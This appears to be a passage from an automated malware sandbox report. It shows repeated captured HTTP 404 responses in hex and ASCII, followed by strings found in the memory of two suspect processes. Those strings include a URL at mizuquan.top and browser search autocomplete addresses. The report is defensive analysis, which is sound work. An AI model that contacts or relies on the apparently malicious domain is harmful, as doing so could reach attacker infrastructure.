            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 09:38:11 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 09:38:14 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 09:38:16 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 09:38:19 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 09:38:24 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 09:38:27 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 09:38:29 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 09:38:32 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 25 Sep 2024 09:39:05 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 25 Sep 2024 09:39:08 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 25 Sep 2024 09:39:11 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 25 Sep 2024 09:39:13 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: eMNaOgRkIZi.exe, 0000000D.00000002.3108584248.0000000004DE1000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mizuquan.top
            Source: eMNaOgRkIZi.exe, 0000000D.00000002.3108584248.0000000004DE1000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mizuquan.top/e0nr/
            Source: netbtugc.exe, 0000000C.00000003.1808011117.0000000007C0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: netbtugc.exe, 0000000C.00000003.1808011117.0000000007C0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: netbtugc.exe, 0000000C.00000003.1808011117.0000000007C0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: netbtugc.exe, 0000000C.00000003.1808011117.0000000007C0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: netbtugc.exe, 0000000C.00000003.1808011117.0000000007C0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: netbtugc.exe, 0000000C.00000003.1808011117.0000000007C0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
